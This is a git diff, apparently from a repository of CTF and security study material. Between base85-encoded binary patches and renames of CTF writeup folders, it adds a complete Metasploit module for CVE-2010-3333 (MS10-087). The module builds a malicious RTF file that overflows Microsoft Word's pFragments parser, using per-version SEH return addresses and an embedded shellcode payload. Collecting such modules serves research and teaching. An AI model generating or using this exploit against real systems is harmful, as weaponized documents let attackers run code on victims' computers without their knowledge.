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 'MS10-087 Microsoft Word RTF pFragments Stack Buffer Overflow (File Format)', + 'Description' => %q{ + This module exploits a stack-based buffer overflow in the handling of the + 'pFragments' shape property within the Microsoft Word RTF parser. All versions + of Microsoft Office 2010, 2007, 2003, and XP prior to the release of the + MS10-087 bulletin are vulnerable. + + This module does not attempt to exploit the vulnerability via Microsoft Outlook. + + The Microsoft Word RTF parser was only used by default in versions of Microsoft + Word itself prior to Office 2007. With the release of Office 2007, Microsoft + began using the Word RTF parser, by default, to handle rich-text messages within + Outlook as well. It was possible to configure Outlook 2003 and earlier to use + the Microsoft Word engine too, but it was not a default setting. + + It appears as though Microsoft Office 2000 is not vulnerable. It is unlikely that + Microsoft will confirm or deny this since Office 2000 has reached its support + cycle end-of-life. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'wushi of team509', # original discovery + 'unknown', # exploit found in the wild + 'jduck', # Metasploit module + 'DJ Manila Ice, Vesh, CA' # more office 2007 for the lulz + ], + 'References' => + [ + [ 'CVE', '2010-3333' ], + [ 'OSVDB', '69085' ], + [ 'MSB', 'MS10-087' ], + [ 'BID', '44652' ], + [ 'URL', 'http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=880' ] + ], + 'DefaultOptions' => + { + 'EXITFUNC' => 'process', + }, + 'Payload' => + { + 'Space' => 512, + 'BadChars' => "\x00", + 'DisableNops' => true # no need + }, + 'Platform' => 'win', + 'Targets' => + [ + # This automatic target will combine all targets into one file :) + [ 'Automatic', { } ], + + # Office v10.6854.6845, winword.exe v10.0.6854.0 + [ 'Microsoft Office 2002 SP3 English on Windows XP SP3 English', + { + 'Offsets' => [ 23532, 45944 ], + #'Ret' => 0x30002491 # p/p/r in winword.exe v10.0.6854.0 + 'Ret' => 0x30002309 # p/p/r in winword.exe v10.0.6866.0 + } + ], + + # Office v11.8307.8324, winword.exe v11.0.8307.0 + # Office v11.8328.8221, winword.exe v11.0.8328.0 + [ 'Microsoft Office 2003 SP3 English on Windows XP SP3 English', + { + 'Offsets' => [ 24580, 51156 ], + 'Ret' => 0x30001bdd # p/p/r in winword.exe + } + ], + + # In order to exploit this bug on Office 2007, a SafeSEH bypass method is needed. + + # Office v12.0.6425.1000, winword.exe v12.0.6425.1000 + [ 'Microsoft Office 2007 SP0 English on Windows XP SP3 English', + { + 'Offsets' => [ 5956 ], + 'Ret' => 0x00290b0b # call ptr to ebp + 30, hits the next record + } + ], + + [ 'Microsoft Office 2007 SP0 English on Windows Vista SP0 English', + { + 'Offsets' => [ 5956 ], + 'Ret' => 0x78812890 # p/p/r in msxml5.dll which wasn't opted into SafeSEH. say word. + } + ], + + [ 'Microsoft Office 2007 SP0 English on Windows 7 SP0 English', + { + 'Offsets' => [ 5956 ], + 'Ret' => 0x78812890 # p/p/r in msxml5.dll which wasn't opted into SafeSEH. say word. + } + ], + + + # crash on a deref path to heaven. + [ 'Crash Target for Debugging', + { + 'Offsets' => [ 65535 ], + 'Ret' => 0xdac0ffee + } + ] + ], + 'DisclosureDate' => 'Nov 09 2010', + 'DefaultTarget' => 0)) + + register_options( + [ + OptString.new('FILENAME', [ true, 'The file name.', 'msf.rtf']), + ]) + end + + def add_target(rest, targ) + targ['Offsets'].each { |off| + seh = generate_seh_record(targ.ret) + rest[off, seh.length] = seh + distance = off + seh.length + jmp_back = Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-" + distance.to_s).encode_string + rest[off + seh.length, jmp_back.length] = jmp_back + } + end + + def exploit + + # Prepare a sample SEH frame and backward jmp for length calculations + seh = generate_seh_record(0xdeadbeef) + jmp_back = Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-0xffff").encode_string + + # RTF property Array parameters + el_size = sz_rand() + el_count = sz_rand() + + data = '' + # These words are presumably incorrectly used + # assert(amount1 <= amount2) + data << [0x1111].pack('v') * 2 + data << [0xc8ac].pack('v') + + # Filler + if target.name =~ /Debug/i + rest = Rex::Text.pattern_create(0x10000 + seh.length + jmp_back.length) + else + len = 51200 + rand(1000) + rest = rand_text(len + seh.length + jmp_back.length) + rest[0, payload.encoded.length] = payload.encoded + end + + # Stick fake SEH frames here and there ;) + if target.name == "Automatic" + targets.each { |t| + next if t.name !~ /Windows/i + + add_target(rest, t) + } + else + add_target(rest, target) + end + + # Craft the array for the property value + sploit = "%d;%d;" % [el_size, el_count] + sploit << data.unpack('H*').first + sploit << rest.unpack('H*').first + + # Assemble it all into a nice RTF + content = "{\\rtf1" + content << "{\\shp" # shape + content << "{\\sp" # shape property + content << "{\\sn pFragments}" # property name + content << "{\\sv #{sploit}}" # property value + content << "}" + content << "}" + content << "}" + + print_status("Creating '#{datastore['FILENAME']}' file ...") + file_create(content) + + end + + def sz_rand + bad_sizes = [ 0, 2, 4, 8 ] + x = rand(9) + while bad_sizes.include? x + x = rand(9) + end + x + end +end diff --git a/src/writeup/6.2.3_re_codegate2017_angrybird/angrybird_mod b/src/writeup/6.2.3_re_codegatectf2017_angrybird/angrybird_mod similarity index 100% rename from src/writeup/6.2.3_re_codegate2017_angrybird/angrybird_mod rename to src/writeup/6.2.3_re_codegatectf2017_angrybird/angrybird_mod diff --git a/src/writeup/6.2.3_re_codegate2017_angrybird/angrybird_org b/src/writeup/6.2.3_re_codegatectf2017_angrybird/angrybird_org similarity index 100% rename from src/writeup/6.2.3_re_codegate2017_angrybird/angrybird_org rename to src/writeup/6.2.3_re_codegatectf2017_angrybird/angrybird_org diff --git a/src/writeup/6.2.3_re_codegate2017_angrybird/exp.py b/src/writeup/6.2.3_re_codegatectf2017_angrybird/exp.py similarity index 100% rename from src/writeup/6.2.3_re_codegate2017_angrybird/exp.py rename to src/writeup/6.2.3_re_codegatectf2017_angrybird/exp.py diff --git a/src/writeup/6.2.6_re_seccon2017_printf_machine/default.fs b/src/writeup/6.2.6_re_secconctf2017_printf_machine/default.fs similarity index 100% rename from src/writeup/6.2.6_re_seccon2017_printf_machine/default.fs rename to src/writeup/6.2.6_re_secconctf2017_printf_machine/default.fs diff --git a/src/writeup/6.2.6_re_seccon2017_printf_machine/fsmachine b/src/writeup/6.2.6_re_secconctf2017_printf_machine/fsmachine similarity index 100% rename from src/writeup/6.2.6_re_seccon2017_printf_machine/fsmachine rename to src/writeup/6.2.6_re_secconctf2017_printf_machine/fsmachine diff --git a/src/writeup/6.2.7_re_codegatectf2018_redvelvet/RedVelvet b/src/writeup/6.2.7_re_codegatectf2018_redvelvet/RedVelvet new file mode 100644 index 0000000000000000000000000000000000000000..f2008411f22b0230f4f37a0af6b2b052fb4d8a88 GIT binary patch literal 13784 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